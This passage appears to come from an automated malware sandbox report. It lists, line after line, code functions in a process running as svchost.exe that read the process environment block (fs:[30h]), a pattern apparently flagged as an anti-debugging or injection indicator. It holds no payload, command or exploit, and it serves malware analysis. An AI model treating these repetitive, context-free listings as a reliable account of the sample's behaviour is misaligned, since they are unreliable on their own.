          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004500 mov eax, dword ptr fs:[00000030h] | 1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004500 mov eax, dword ptr fs:[00000030h] | 1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004500 mov eax, dword ptr fs:[00000030h] | 1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004500 mov eax, dword ptr fs:[00000030h] | 1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004500 mov eax, dword ptr fs:[00000030h] | 1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004500 mov eax, dword ptr fs:[00000030h] | 1_2_03004500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h] | 1_2_02F304E5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h] | 1_2_02F644B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h] | 1_2_02FBA4B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h] | 1_2_02F364AB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h] | 1_2_02F5A470
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h] | 1_2_02F5A470
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h] | 1_2_02F5A470
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h] | 1_2_02FBC460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h] | 1_2_02F2645D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h] | 1_2_02F5245A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h] | 1_2_02F6E443
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h] | 1_2_02F2E420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h] | 1_2_02F2E420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h] | 1_2_02F2E420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h] | 1_2_02F2C427
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h] | 1_2_02FB6420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h] | 1_2_02F68402
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h] | 1_2_02F68402
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h] | 1_2_02F68402
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E5E7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h] | 1_2_02F325E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h] | 1_2_02F6C5ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h] | 1_2_02F6C5ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F365D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F6A5D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F6A5D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h] | 1_2_02F6E5CF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h] | 1_2_02F6E5CF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h] | 1_2_02F545B1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h] | 1_2_02F545B1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h] | 1_2_02FB05A7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h] | 1_2_02FB05A7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h] | 1_2_02FB05A7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h] | 1_2_02F6E59C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h] | 1_2_02F32582
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h] | 1_2_02F32582
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h] | 1_2_02F64588
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h] | 1_2_02F6656A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h] | 1_2_02F6656A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h] | 1_2_02F6656A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h] | 1_2_02F38550
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h] | 1_2_02F38550
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h] | 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h] | 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h] | 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h] | 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h] | 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h] | 1_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02F5E53E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h] | 1_2_02F6AAEE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h] | 1_2_02F6AAEE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h] | 1_2_02F30AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h] | 1_2_02F64AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h] | 1_2_02F64AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h] | 1_2_02F86ACC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h] | 1_2_02F86ACC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h] | 1_2_02F86ACC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h] | 1_2_02F38AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h] | 1_2_02F38AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h] | 1_2_02F86AA4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h] | 1_2_02F68A90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h] | 1_2_02FACA72
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h] | 1_2_02FACA72
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h] | 1_2_02F6CA6F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h] | 1_2_02F6CA6F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h] | 1_2_02F6CA6F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02F36A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h] | 1_2_02F40A5B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h] | 1_2_02F40A5B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h] | 1_2_02F54A35
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h] | 1_2_02F54A35
